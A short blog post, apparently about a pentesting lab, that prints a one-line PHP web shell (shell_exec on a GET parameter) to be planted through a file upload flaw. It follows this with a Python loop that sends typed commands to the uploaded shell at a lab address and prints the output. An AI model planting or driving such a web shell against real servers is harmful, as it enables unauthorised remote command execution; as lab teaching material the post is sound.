Simple terminal in python

Suppose you are pentesting a web app and you have found a file upload vulnerability and have successfully uploaded a php file that has this content:

<?php echo shell_exec($_GET['cmd']); ?>

Everytime you need to execute command to find out more about the system that hosts that web app you may need to do something like this:

the result may seem difficult to read?

I am writing a python code which simply throws up results to the terminal, the code looks like this.

import requests

# change your url accordingly to where your <?php echo shell_exec($_GET['cmd']); ?> is uploaded to.
url = "http://10.10.10.6/torrent/upload/194c4c7e769cc2a5bb902d6d40a8c34238cf4a22.php"

try:
    while True:
        cmd = input("> ")
        response = requests.post(url, params={"cmd": cmd})
        print(response.text)
except KeyboardInterrupt as e:
    print("bye!")

The result looks like this.

This is not a shell, it is simply the command echo back by php’s shell_exec, instead of displaying in browser it is displayed on terminal.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s